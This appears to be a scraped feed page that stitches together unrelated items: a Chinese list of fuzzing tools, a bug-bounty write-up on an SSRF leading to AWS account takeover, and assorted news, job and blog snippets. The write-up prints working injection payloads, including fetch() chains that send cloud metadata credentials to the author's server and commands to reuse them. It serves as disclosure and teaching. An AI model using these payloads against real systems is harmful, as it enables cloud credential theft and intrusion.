对于Linux和Mac OSX。 NodeFuzz是一个用于网络浏览器和类似浏览器的应用程序的模糊器。 NodeFuzz背后有两个主要的想法:第一是创建一个简单、快速、不同浏览器的fuzz方法。 第二,有一个线束,可以轻松地扩展与新的测试用例发生器和客户端仪器,无需修改核心。

Grinder
https://github.com/stephenfewer/grinder
对于windows
Grinder是一个自动化浏览器的模糊化和大量崩溃管理的系统。

Kitty
https://github.com/Cisco-sas/kitty
Kitty是一个开源的模块化和可扩展的模糊框架,使用python编写,灵感来自OpenRCE的Sulley和Michael Eddington(现在是Deja vu Security的)Peach Fuzzer。

Peach
http://community.peachfuzzer.com/
https://github.com/MozillaSecurity/peach
Peach是一个SmartFuzzer,能够执行基于生成和基于突变的模糊测试。

3.此外,还有这些免费的但不是开源的fuzzer:

SDL MiniFuzz File Fuzzer
https://www.Microsoft.com/en-us/download/details.aspx?id=21769
对于Windows。 SDL MiniFuzz File Fuzzer是一个基本的文件模糊工具,旨在简化非安全开发人员对模糊测试的采用,这些非安全开发人员不熟悉文件模糊工具或从未在当前的软件开发过程中使用它们。

Rfuzz
http://rfuzz.rubyforge.org/index.html
RFuzz是一个Ruby库,可以使用快速HttpClient和wicked vil RandomGenerator轻松地从外部测试Web应用程序,它允许普通程序员每天使用先进的模糊技术。

Spike
http://www.immunitysec.com/downloads/SPIKE2.9.tgz
SPIKE是一个API框架,允许你编写模糊器。

Regex Fuzzer
http://go.microsoft.com/?linkid=9751929
DL Regex Fuzzer是一个验证工具,用于帮助测试正则表达式是否存在潜在的拒绝服务漏洞。它包含用指数时间执行的某些子句的正则表达式模式(例如,包含自身重复的重复的子句)可以被攻击者利用来引起拒绝服务(DoS)条件。SDL Regex Fuzzer与SDL过程模板和MSF-Agile + SDL过程模板集成,以帮助用户跟踪和消除其项目中的任何检测到的正则表达式漏洞。

4.博客,将帮助你fuzz更好
Yawml的开始到完成模糊与AFL(一个完整的fuzzjob由foxglovesecurity)
http://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/

Fuzz更聪明,更难 - 用afl引发模糊,来自bsidessf2016的引物
https://www.peerlyst.com/posts/bsidessf-2016-recap-of-fuzz-smarter-not-harder-an-afl-primer-claus-cramon

Fuzzing和afl是一种艺术
Fuzzing nginx 和 American Fuzzy Lop
您可以在此处的评论或此Google文档中发表建议:
https://docs.google.com/document/d/17pZxfs8hXBCnhfHoKfJ7JteGziNB2V_VshsVxmNRx6U/edit?usp=sharing

BSidesLisbon 2016主题演讲:智能模糊器革命
Windows内核模糊初学者 - Ben Nagy

5.其他Fuzzer博客:
循环使用编译器转换的模糊包版
谷歌推出了OSS-Fuzz(感谢Dinko Cherkezov) - 一个项目,旨在不断开发开源项目fuzz:
OSS-Fuzz现在正在测试中,并即将接受候选开源项目的建议。为了使项目被OSS-Fuzz接受,它需要有一个庞大的用户基础或针对于至关重要的全球IT基础设施,这是一个通用启发式方法,我们有意在这个早期阶段解释。查看更多详情和说明如何在这里申请。
一旦项目注册了OSS-Fuzz,它将自动接收到我们的跟踪器中,新报告的错误披露截止于90天后(见此处的详细信息)。 这符合行业的最佳实践,并通过更快地为用户提供补丁来提高最终用户的安全性和稳定性。
帮助我们确保这个程序真正服务于开源社区和依赖这个关键软件的互联网,贡献和留下您的反馈在GitHub。

这里写图片描述

6.商业模糊器

超越安全的暴风雨
http://www.beyondsecurity.com/bestorm_and_the_SDL.html
管理员编辑:查找更多真棒Peerlyst社区贡献的资源,资源目录在这里
这里写图片描述

7.关于浏览器的Fuzzing

Skyfire 一种用于Fuzzing的数据驱动的种子生成工具
https://www.inforsec.org/wp/?p=2678
https://www.ieee-security.org/TC/SP2017/papers/42.pdf

使用libFuzzer fuzz Chrome V8入门指南
http://www.4hou.com/info/news/6191.html


          AWS takeover through SSRF in JavaScript      Cache   Translate Page      

Here is the story of a bug I found in a private bug bounty program on Hackerone. It toke me exactly 12h30 -no break- to find it, exploit and report. I was able to dump the AWS credentials, this lead me to fully compromise the account of the company: 20 buckets and 80 EC2 instances (Amazon Elastic Compute Cloud) in my hands. Besides the fact that it’s one of my best bug in my hunter career, I also learnt alot during this sprint, so let’s share!

Intro

As I said, the program is private so the company, let’s call it: ArticMonkey.
For the purpose of their activity -and their web application- ArticMonkey has developed a custom macro language, let’s call it: Banan++. I don’t know what language was initially used for the creation of Banan++ but from the webapp you can get a JavaScript version, let’s dig in!

The original banan++.js file was minified, but still huge, 2.1M compressed, 2.5M beautified, 56441 lines and 2546981 characters, enjoy. No need to say that I didn’t read the whole sh… By searching some keywords very specific to Banan++, I located the first function in line 3348. About 135 functions were available at that time. This was my playground.

Spot the issue

I started to read the code by the top but most of the functions were about date manipulation or mathematical operations, nothing really insteresting or dangerous. After a while, I finally found one called Union() that looked promising, below the code:

helper.prototype.Union = function() {
   for (var _len22 = arguments.length, args = Array(_len22), _key22 = 0; _key22 < _len22; _key22++) args[_key22] = arguments[_key22];
   var value = args.shift(),
    symbol = args.shift(),
    results = args.filter(function(arg) {
     try {
      return eval(value + symbol + arg)
     } catch (e) {
      return !1
     }
    });
   return !!results.length
  }

Did you notice that? Did you notice that kinky eval()? Looks sooooooooooo interesting! I copied the code on a local HTML file in order to perform more tests.

Basically the function can take from 0 to infinite arguments but start to be useful at 3. The eval() is used to compare the first argument to the third one with the help of the second, then the fourth is tested, the fifth etc… Normal usage should be something like Union(1,'<',3); and the returned value true if at least one of these tests is true or false.
However there is absolutely no sanitization performed or test regarding the type and the value of the arguments. With the help of my favourite debugger -alert()- I understood that an exploit could be triggered in many different ways:

Union( 'alert()//', '2', '3' );
Union( '1', '2;alert();', '3' );
Union( '1', '2', '3;alert()' );
...

Find an injection point

Ok so I had a vulnerable function, which is always good, but what I needed was a input to inject some malicious code. I remembered that I already seen some POST parameters using Banan++ functions so I performed a quick search in my Burp Suite history. Got it:

POST /REDACTED HTTP/1.1
Host: api.REDACTED.com
Connection: close
Content-Length: 232
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3502.0 Safari/537.36 autochrome/red
Content-Type: application/json;charset=UTF-8
Referer: https://app.REDACTED.com/REDACTED
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: auth=REDACTED

{...REDACTED...,"operation":"( Year( CurrentDate() ) > 2017 )"}

Response:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 54
Connection: close
X-Content-Type-Options: nosniff
X-Xss-Protection: 1
Strict-Transport-Security: max-age=15768000; includeSubDomains
...REDACTED...

[{"name":"REDACTED",...REDACTED...}]

The parameter operation seems to be a good option. Time for testing!

Perform the injection

Since I didn’t know anything about Banan++, I had to perform some tests in order to find out what kind of code I could inject or not. Sort of manual fuzzing.

{...REDACTED...,"operation":"'\"><"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":null}
[]
{...REDACTED...,"operation":"0"}
[]
{...REDACTED...,"operation":"1"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"a"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"a=1"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"alert"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"alert()"}
{"status":400,"message":"Function 'alert' is not defined"}
{...REDACTED...,"operation":"Union()"}
[]

What I conclued here was:

  • I cannot inject whatever JavaScript I want
  • I can inject Banan++ functions
  • the response seems to act like a true/false flag depending if the interpretation of parameter operation is true or false (which was very useful because it helped to validate the code I injected)

Let’s continue with Union():

{...REDACTED...,"operation":"Union(1,2,3)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union(a,b,c)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union('a','b','c')"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union('a';'b';'c')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'2';'3')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'<';'3')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'>';'3')"}
[]]

Perfect! If 1 < 3 then the response contains valid datas (true), but if 1 > 3 then the response is empty (false). Parameters must be separated by a semi colon. I could now try a real attack.

fetch is the new XMLHttpRequest

Because the request is an ajax call to the api that only returns JSON datas, it’s obviously not a client side injection. I also knew from a previous report that ArticMonkey tends to use alot JavaScript server side.

But it doesn’t matter, I had to try everything, maybe I could trigger an error that would reveal informations about the system the JavaScript runs on. Since my local testing, I knew exactly how to inject my malicious code. I tried basic XSS payloads and malformed JavaScript but all I got was the error previously mentionned.

I then tried to fire an HTTP request.

Through ajax call first:

x = new XMLHttpRequest;
x.open( 'GET','https://poc.myserver.com' );
x.send();

But didn’t receive anything. I tried HTML injection:

i = document.createElement( 'img' );
i.src = '<img src="https://poc.myserver.com/xxx.png">';
document.body.appendChild( i );

But didn’t receive anything! More tries:

document.body.innerHTML += '<img src="https://poc.myserver.com/xxx.png">';
document.body.innerHTML += '<iframe src="https://poc.myserver.com">';

But didn’t receive anything!!!

Sometimes you know, you have to test stupid things by yourself to understand how stupid it was… Obviously it was a mistake to try to render HTML code, but hey! I’m just a hacker… Back to the ajax request, I stay stuck there for a while. It toke me quite a long time to figure out how to make it work.

I finally remembered that ArticMonkey uses ReactJS on their frontend, I would later learnt that they use NodeJS server side. Anyway, I checked on Google how to perform an ajax request with it and found the solution in the official documention which lead me to the fetch() function which is the new standard to perform ajax call, that was the key.

I injected the following:

fetch('https://poc.myserver.com')

And immediately got a new line in my Apache log.

Being able to ping my server is a thing but it’s a blind SSRF, I had no response echoed back. I had the idea to chain two requests where the second would send the result of the first one. Something like:

x1 = new XMLHttpRequest;
x1.open( 'GET','https://...', false );
x1.send();
r = x1.responseText;

x2 = new XMLHttpRequest;
x2.open( 'GET','https://poc.myserver.com/?r='+r, false );
x2.send();

Again it toke me while to get the correct syntax with fetch(). Thanks StackOverflow.

I ended with the following code which works pretty well:

fetch('https://...').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

Of course, Origin policy applies.

SSRF for the win

I firstly tried to read local files:

fetch('file:///etc/issue').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

But the response (r parameter) in my Apache log file was empty.

Since I found some S3 buckets related to ArticMonkey (articmonkey-xxx), I thought that this company might also use AWS servers for their webapp (which was also confirmed by the header in some responses x-cache: Hit from cloudfront). I quickly jump on the list of the most common SSRF URL for Cloud Instances.

And got a nice hit when I tried to access the metadatas of the instance. aws takeover through ssrf in javascript

Final payload:

{...REDACTED...,"operation":"Union('1';'2;fetch(\"http://169.254.169.254/latest/meta-data/\").then(res=>res.text()).then((r)=>fetch(\"https://poc.myserver.com/?r=\"+r));';'3')"}

Decoded output is the directory listing returned:

ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
...

Since I didn’t know anything about AWS metadatas, because it was my first time in da place. I toke time to explore the directories and all files at my disposition. As you will read everywhere, the most insteresting one is http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE>. Which returned:

{
  "Code":"Success",
  "Type":"AWS-HMAC",
  "AccessKeyId":"...REDACTED...",
  "SecretAccessKey":"...REDACTED...",
  "Token":"...REDACTED...",
  "Expiration":"2018-09-06T19:24:38Z",
  "LastUpdated":"2018-09-06T19:09:38Z"
}

Exploit the credentials

At that time, I though that the game was ended. But for my PoC I wanted to show the criticity of this leak, I wanted something really strong! I tried to use those credentials to impersonate the company. You have to know that they are temporary credentials, only valid for a short period, 5mn more or less. Anyway, 5mn is supposed to be enough to update my own credentials to those ones, 2 copy/paste, I think I can handle that… err…

I asked for help on Twitter from SSRF and AWS master. Thank guys, I truely appreciate your commitment, but I finally found the solution in the UserGuide of AWS Identity and Access Management. My mistake, except to not read the documentation (…), was to only use AccessKeyId and SecretAccessKey, this doesn’t work, the token must also be exported. Kiddies…

$ export AWS_ACCESS_KEY_ID=AKIAI44...
$ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI...
$ export AWS_SESSION_TOKEN=AQoDYXdzEJr...

Checking my idendity with the following command proved that I was not myself anymore.

aws sts get-caller-identity

And then…
aws takeover through ssrf in javascript

Left: listing of the EC2 instances configured by ArticMonkey. Probably a big part -or the whole- of their system.

Right: the company owns 20 buckets, containing highly sensitive datas from customers, static files for the web application, and according to the name of the buckets, probably logs/backups of their server.

Impact: lethal.

Timeline

06/09/2018 12h00 - beginning of the hunt
07/09/2018 00h30 - report
07/09/2018 19h30 - fix and reward

Thanks to ArticMonkey for being so fast to fix and reward, and agreed this article :)

Conclusion

I learnt alot because of this bug:

  • ReactJS, fetch(), AWS metadatas.
  • RTFM! The official documentation is always a great source of (useful) informations.
  • At each step new problems appeared. I had to search everywhere, try many different things, I had to push my limits to not give up.
  • I now know that I can fully compromise a system by myself starting from 0, which is a great personal achievement and statisfaction :)

When someone tells you that you’ll never be able to do something, don’t waste your time to bargain with these peoples, simply prove them they’re wong by doing it.


          Sourced by Oxfam - Team Administrator (TRD1923)      Cache   Translate Page      
Region: Central, Division: Trading, Job Type: Open ended
Oxfam is a global movement of people working together to end the injustice of poverty.  That means we tackle the inequality that keeps people poor. Together we save, protect and rebuild lives. When disaster strikes, we help people build better lives for themselves, and for others. We take on issues like land rights, climate change and discrimination against women. And we won’t stop until every person on the planet can enjoy life free from poverty.

 

We are an international confederation of 20 organizations working together with partners and local communities in the areas of humanitarian, development and campaigning, in more than 90 countries.

 

Oxfam is committed to preventing any type of unwanted behavior at work including sexual harassment, exploitation and abuse,...

          Independents Disapprove Of Democrats’ Handling Of Kavanaugh Nomination By 28-point Margin      Cache   Translate Page      
And given most polls skew in favor of Democrats, it’s probably even worse. Via Washington Examiner: After a blistering confirmation battle, Justice Brett Kavanaugh will take his seat for oral arguments on the U.S. Supreme Court with a skeptical public, a majority of which opposed his nomination. However, Democrats may not be able to exploit […]
          Mécanicien Remorques - Groupe Robert - Boucherville, QC      Cache   Translate Page      
*Une carrière t'attends! Venez vous joindre à notre équipe!* Tu cherches un endroit ou tu pourras exploiter ton plein potentiel? Tu aimerais grandir au sein d... $24.38 - $30.70 an hour
From Indeed - Mon, 17 Sep 2018 18:36:04 GMT - View all Boucherville, QC jobs
          The Fat Bear Week finals are here. Which fat bear will reign supreme?      Cache   Translate Page      
TwitterFacebook

Welcome to Fat Bear Week at Mashable! Each fall, Katmai National Park holds a competition as Alaska’s brown bears finish fattening up for their long winter hibernation. This year, Mashable is getting in on the salmon-munching action. Check back with us all week as we follow the fat bear face-offs each day, and remember to get your votes in for each round. Happy fishing!


After six days of strong competition, the Fat Bear Week finals have arrived.

Katmai National Park, where these wild bears live and hibernate, amusingly calls the pinnacle of the week-long contest "Fat Bear Tuesday." 

This year's Tuesday match features two profoundly fat bears, both of whom clearly exploited a Brooks River that teemed with 2018's exceptional and long run of 4,500-calorie salmon.  Read more...

More about Science, Animals, Bears, Fat Bear Week, and Science
          Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday. Reported by Reuters 43 minutes ago.
          Grâce au Match Marketing, Best Western France relance l'engagement client      Cache   Translate Page      
Le groupe hôtelier booste la performance de ses campagnes de marketing client grâce à la plateforme d'Influans.
Grâce au Match Marketing, Best Western France relance l'engagement client
Influans annonce aujourd'hui que Best Western France exploite la plateforme de Match Marketing d'Influans pour driver la performance de son marketing client.

b[La personnalisatio...


          The Surprising Effectiveness of Gentle Public Shaming      Cache   Translate Page      
Where would you put your money? Leave it to the staff of one of my favorite lunch places to come up with a brilliant example of the persuasive communication. What do I love about it? It’s absolutely of the moment. It exploits identity to motivate us to action (We all want to express how we […]
          The sea raiders, T1      Cache   Translate Page      

14€

Bande dessinée (cartonné)

The sea raiders, T1


Philippe Zytka, Dusan Bozic

Découvrez cette nouvelle série, basée sur des faits réels d'unités ayant existées pendant la Seconde Guerre Mondiale, le S.B.S. (Special Boat Service). Une petite force d'à peine 300 hommes, qui ont harcelé les allemands en méditerranée et en mer Egée. Ils se déplaçaient généralement de nuit, utilisant des sous-marins, des vedettes rapides ou toute autre sorte d'embarcation. Lars le Danois, Ambrose l'anglais, Tibor le Hongrois et Liam l'Irlandais forment l'une des équipes de cette nouvelle force du Special Boat Service qui vont vous faire découvrir leurs exploits !



          Singular Estates of Gonzalez Byass      Cache   Translate Page      
On connaît le groupe Gonzalez Byass pour ses sherries – notamment la marque Tio Pepe. Mais depuis plus de 30 ans, la famille Gonzalez Byass est sortie de son berceau andalou, investissant aux quatre coins de d’Espagne, où elle exploite une série de domaines regroupés sous le nom de Singular Estates. Et notamment: Bodegas Beronia …

Lire la suite de Singular Estates of Gonzalez Byass


          Machiniste - Groupe G7 - Sept-Îles, QC      Cache   Translate Page      
Mettre en place et exploiter des machines de coupe et de meulage de précision en métal telles que des tours, fraiseuses, perceuses, etc;...
From Indeed - Tue, 09 Oct 2018 18:20:11 GMT - View all Sept-Îles, QC jobs
          Italie : grève des transports les 25 et 26 octobre       Cache   Translate Page      
Les voyageurs d'affaires ont intérêt à ne pas organiser de déplacement professionnel en Italie les 25 et 26 octobre. L'activité du pays ser...
A lire sur www.deplacementspros.com Ce flux est proposé pour une consultation privée et ne saurait être exploité sur un site internet sans un accord écrit de l'éditeur de DéplacementsPros.com © reproduction interdite sans l'autorisation de DeplacementsPros.com

          Rosie DiManno: Ontario lawyer accused of seducing vulnerable teenage clients      Cache   Translate Page      

The lawyer sits next to his lawyer in front of a disciplinary panel of lawyers.

The allegations against Gavin McNeill Grant:

  • He impregnated a 17-year-old client, a homeless Crown ward, after acting as duty counsel during her appearance at an Owen Sound courthouse and obtaining the young woman’s release.

  • He had threesome sex with that girl and another teenager at the latter’s apartment, a teenager who — according to her mother — has the intellectual capacity of a 12- to 14-year-old.

  • During a party at his office with the two teenagers, he took delivery of cocaine from one of his criminal clients, consuming almost a gram of blow within minutes, as described by another person present.

  • He propositioned and tried to seduce an 18-year-old client.

  • He took a client/girlfriend on holidays and violently assaulted her in a Florence hotel room. The woman suffered a dislocated jaw, sprained ankle and multiple bruises.

That last alleged incident was contained in an affidavit filed with a Law Society of Ontario disciplinary panel on Tuesday morning. The complainant came forward after reading a media report about Grant’s earlier hearing last week.

At the Oct. 2 procedure, the tribunal allowed Grant to keep his licence to practice, pending a full hearing for an interim suspension. On Tuesday, through his lawyer, Grant granted consent on the interim suspension. That sends the matter to a full disciplinary hearing, probably no earlier than next summer.

“We are prepared to grant the consent order that is proposed by the parties,” said Barbara Murchie, on behalf of the disciplinary tribunal. “I will sign the order and there will be reasons to follow.”

If the full hearing tribunal finds against Grant, 49, his licence could be permanently revoked.

Grant has at least once before been fired from his law firm, according to Law Society investigators, for “erratic and drug-influenced behaviour, missing court dates, purchasing liquor for a minor, minimizing his substance abuse addictions and having sex with teenage clients. In August, 2017, Grant opened his own office in Owen Sound, Ont.

To wind around back to the beginning, the Owen Sound police first investigated Grant in the summer of 2016, after receiving allegations that the lawyer had been involved in an “exploitative sexual relationship” with a 17-year-old Crown ward, Erica. (All of the girls and their parents’ identities are covered by a publication ban; pseudonyms are used in the affidavits.) Det.-Sgt. Peter Daniels brought the matter to the Law Society this past August.

The panel was told by discipline counsel Elaine Strosberg last week that, in June 2016, as duty counsel, Grant had secured bail for Erica. Some six weeks later, Erica approached Grant to hire him as her lawyer. In an interview with the Law Society investigator, Grant said he told Erica he couldn’t represent her because he’s already assisted as duty counsel on her case and recommended another lawyer. Grant didn’t know Erica’s age and didn’t realize she was a minor, he said, because “she doesn’t look young.”

Erica told the investigator that they subsequently had a “brief” sexual relationship and hung around together for a while. At a party in his office not long afterward, it was Erica, Grant insisted, who “got on my lap, kissing me, everyone was drinking, that kind of thing.”

He has denied ever doing any drugs with the teenager.

In the last four years, Grant admits he’s been hospitalized for addiction “probably three or four times.”

The second girl, Poppy, told investigators she attended a party at Grant’s office with Erica in July, 2016. They then went to Poppy’s apartment, with Grant allegedly serving the girls scotch and gin. Erica allegedly wanted to use Poppy’s bed to have sex with Grant because he’d offered her $300. Poppy said no but afterwards heard Grant and Erica having sex on the couch. They left together early the next morning.

At the time, Erica was on bail which required her to remain in residence between 9 p.m. and 6 p.m.

A baby boy was born to Erica in March, 2017. A DNA test confirmed Grant as the father, according to the affidavit.

A second incident involving Poppy allegedly occurred on July 20, 2016, again after a booze and cocaine fuelled party at the lawyer’s office. Grant, Poppy told investigator Adrian Greenaway, invited everyone back to her apartment. Later, through an open bedroom door, Poppy saw Erica performing oral sex on Grant. Erica invited Poppy to join in and she did. This incident was reported the next day to police by Poppy’s mother.

Grant’s purported seduction of young girls, the tribunal was told, dated back eight years when he had propositioned another client, 18-year-old Amy, saying he wanted to snort coke off her backside. Despite the crude proposal, Amy hired Grant for her criminal assault trial. She has claimed he tried to sleep with her the entire time.

That incident was reported to the Law Society last month by senior counsel for Bruce Grey Child and Family Services. Amy was then trying to get back her kids who had been removed by the Children’s Aid Society, with Grant representing her. Before the hearing, Grant allegedly offered Amy a drug that he identified as methamphetamine, which she declined. Amy was further upset because Grant appeared intoxicated in court.

Last week, in urging the disciplinary panel to suspend Grant’s licence until a full hearing, counsel Strosberg argued: “Erica was a Crown ward, homeless and in the criminal justice system and there’s evidence he was impaired in the courthouse … An unchecked drug addict simply cannot be ordered to not partake in drugs.”

When interviewed by phone on Oct. 4, the Bruce Grey Child and Family Services counsel, Christopher Hutton, noted that many of the agency’s clients are young females with addictions, developmental and mental health problems. He could not recall Grant ever representing a male from the agency.

A second Law Society investigator, Brian Borg, conducted that interview. His affidavit, filed Tuesday, included information obtained, through Hutton, from another Child and Family Services client, Jessica, a woman in her early 20s also with a history of addiction struggles. Jessica told Hutton that she believed the reason her case, with Grant as her lawyer, was taking so long was because he was trying to manoeuvre her into sex, coming to her home and meeting her outside business hours.

Most disturbing, however, was the account given by Bella on Oct. 4, the woman who contacted the Law Society after learning of last week’s hearing.

Bella, then 18, had been seven days into a family law trial in 2014, representing herself, when she contacted Grant, whose name had been provided by a friend. She was seeking advice on how to conduct closing arguments. They met in his office after-hours, had drinks, and Grant tried to kiss her. After she left, Grant texted her, saying he’d like to see her again. Thus began and on-and-off relationship that ended after the alleged assault in Florence on May 31. Bella is the young woman Grant had taken to Europe.

She has provided Borg with a report from Italian police about the alleged assault and photos taken upon her return to Canada, documenting the injuries.

Bella said Grant had become agitated and aggressive after dinner at a restaurant — he’d asked the waiter for cocaine, which upset her, she said — because he wanted to have sex and she didn’t. According to the Italian police report, Grant tried to force her into sex, grabbing her by the arms, pushing her on the bed with his knee on her back. She fled to the lobby, where she spent the night.

Supporting documents for Borg’s affidavit include the transcript of his interview with Bella. She describes how their relationship had become more serious, steady, following a troubling discovery she’d made last February.

“We were dating until I found out he was actually living with someone, and that was Erica.”

Rosie DiManno is a columnist based in Toronto covering sports and current affairs. Follow her on Twitter: @rdimanno


          Contremaître(sse), Exploitation - ArcelorMittal Exploitation minière Canada s.e.n.c. - Port-Cartier, QC      Cache   Translate Page      
Connaissance de base dans les autres métiers reliés aux opérations (mécanique, soudure, plomberie, électricité);...
From ArcelorMittal Exploitation minière Canada s.e.n.c. - Thu, 20 Sep 2018 14:45:31 GMT - View all Port-Cartier, QC jobs
          Opérateur, Exploitation du centre de données - OLG - Toronto, ON      Cache   Translate Page      
Opérateur, Exploitation du centre de données Location: Toronto, Ontario, Canada OLG Site or Facility: Lesmill Number of Positions: 2 Job Type: Permanent...
From OLG - Tue, 09 Oct 2018 22:26:58 GMT - View all Toronto, ON jobs
          Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

          La difficile cohabitation des deux seuls primates de Taïwan.      Cache   Translate Page      

A quoi ressemble le macaque de Formose ?

Il mesure entre 40 à 55 cm en moyenne (sans compter la queue qui mesure entre 30 à 45 cm) et pèse entre 5 et 6 kg. Son pelage est de couleurs gris-brun sur la tête, le dos, les pattes et la queue. Il est plus clair sur la partie interne des membres et blanc sur le ventre. Sa face est rosée pigmentée de gris. Il possède des abajoues qui lui permettent de stocker de la nourriture. Sa longévité est de 15 à 20 ans.

Le macaque de Formose : seul primate vivant à Taïwan.

A Taïwan, le macaque n'est pas une espèce menacée et n'est plus protégée, mais bien souvent malmenée. En effet, lʼHomme empiète de plus en plus sur son territoire, notamment de par les exploitations agricoles. Par ailleurs, certains macaques de Formose habitant les parcs nationaux peuvent être agressifs du fait que les touristes les nourrissent.

De ce fait, l'animal habitué à être nourrit n'éprouve plus le besoin de chercher sa nourriture par lui même et vole la nourriture des touristes, ou des locaux qui viennent les nourrir, bien souvent avec des aliments trop gras et sucrés, pas du tout adaptés à leur régime alimentaire.

Sur une des photographies de la galerie, vous pouvez par exemple voir un homme armé dʼun pistolet à plombs intimidant des macaques pour quʼils ne lui volent pas le sac de friandises quʼil est venu leur distribuer.

Une harmonie impossible ? 

Le macaque et l'homme ont donc de plus en plus de mal à vivre en harmonie, et pour cause, parallèlement à la diminution de son territoire à cause de l'activité humaine, sa population a augmenté de plus de 100 000 têtes pour s'approcher des 300 000 individus en une dizaine d'années.

Il vit habituellement dans les forêts taiwanaises allant de 200 à 2000 m d'altitude, mais on peut désormais en apercevoir au bord des routes montagneuses de Taipei, la capitale. Par conséquent, les macaques viennent chaparder dans les récoltes et sont souvent victimes de coups de fusil et de pièges.

Bon nombre sont recueillis au PTRC (le refuge dont nous vous parlions à propos de l'ours noir) car ils sont soit blessés, soit orphelins. Le personnel soignant et les gardiens font tout pour en relâcher le plus possible mais le processus est complexe, et le refuge vient à manquer de place et dʼargent pour en accueillir davantage.

Jimmy Page

Crédit photographique :  © Jimmy Beunardeau


          Quel bilan tirer de la marche contre la fourrure, à Paris ?      Cache   Translate Page      

Parce qu'aujourd'hui, en 2018, de nombreux animaux sont encore exploités pour leur fourrure (et leur peau). Parce que 150 millions d'animaux sont tués chaque année dans le monde pour leur fourrure. Associations et défenseurs des droits des animaux ont décidé de se rassembler et de marcher pour dénoncer l'exploitation des animaux pour leur peau.

Le samedi 6 octobre 2018, une marche contre la fourrure a donc été organisée à Paris. Le point de rendez-vous fut donné dès 12h sur la Place de La République. Objectif de cet événement : Se " rassembler pour se faire entendre, sensibiliser les consommateurs et faire réagir les enseignes sur ce marché complètement abject au XXIème siècle ".

Évolution des mentalités 

Suite au mouvement de plusieurs associations de protection animale, plusieurs grands noms de la mode ont décidé de bannir la fourrure ces dernières années comme Stella McCartney et Calvin Klein et plus récemment Giorgio Armani, Michael Kors, Gucci, Versace ou encore Kooples. Début septembre, la marque Burberry a annoncé à son tour l'arrêt de l'utilisation de fourrure dans ses collections. A noter aussi que la Fashion Week de Londres a décidé, pour son édition 2018 (du 14 au 18 septembre), de présenter des modèles sans fourrure. Toutefois, de nombreuses marques utilisent encore de la fourrure animale...

Face à ce triste constat, les associations continuent donc de se battre, comme cette mobilisation ce 6 octobre 2018 à Paris qui a rassemblé des centaines de citoyens autour de la cause animale.

Ce soir à 21h sur France 2, l'industrie de la fourrure dans le collimateur d'Élise Lucet. Une émission de " Cash Investigation ", présentée par Élise Lucet sur France 2, sera consacrée ce soir aux conditions d'élevage des animaux à fourrure.

Continuer le combat 

" Il y a des associations comme la nôtre qui se battent contre la souffrance animale, mais comme il n'y a pas de lois, nous n'avons pas d'interlocuteurs officiels. Tous ces animaux, de l'élevage jusqu'à l'abattoir, n'ont aucune protection, aucun droit. "

Ce sont les mots révoltés de Chi Szuching, la jeune lanceuse d'alerte, représentante chinoise de l'ONG Peta. L'association décrit les terribles conditions d'élevage des animaux à fourrure.

" La Chine est le premier pays producteur de fourrure au monde. 70 millions d'animaux y sont tués chaque année pour leur peau. Aucune loi ne réglemente les élevages, ni les abattoirs. Les animaux urinent et défèquent dans leur cage. Certains développent des maladies de peau. Des morsures de leurs congénères sont constatées. L'odeur pestilentielle prend à la gorge et personne ne nettoie. "

Ce soir, les journalistes de Cash Investigation mènent l'enquête pour savoir si les grandes marques de luxe européennes s'approvisionnent dans ces élevages...

Photographies de l'article :  © Jimmy Beunardeau

Jimmy Page 


          Programmeur FrontEnd - CORPIQ - Saint-Laurent, QC      Cache   Translate Page      
Rédige les manuels d’utilisateurs et les manuels d’exploitation des systèmes développés. La CORPIQ est à la recherche de vous....
From Indeed - Tue, 09 Oct 2018 19:38:13 GMT - View all Saint-Laurent, QC jobs
          Comment déverouiller automatiquement un volume encrypté LUKS au démarrage de LinuxMint?      Cache   Translate Page      
Dans un article précédent, je vous ai parlé sur comment faire en sorte qu’un volume LUKS soit monté automatiquement lors du lancement de LinuxMint. Ceci vous permettait d’avoir le mot de passe demandé lors du lancement de LinuxMint, plutôt qu’une fois le système d’exploitation tout initialisé. L’article présent, vous montrera comment créer un fichier clef, […]
          The World Is Quietly Decoupling From The US... And No One Is Paying Attention      Cache   Translate Page      

Authored by Alt-Market's Brandon Smith via Birch Gold Group,

Blind faith in the U.S. dollar is perhaps one of the most crippling disabilities economists have in gauging our economic future. Historically speaking, fiat currencies are animals with very short lives, and world reserve currencies are even more prone to an early death. But, for some reason, the notion that the dollar is vulnerable at all to the same fate is deemed ridiculous by the mainstream.

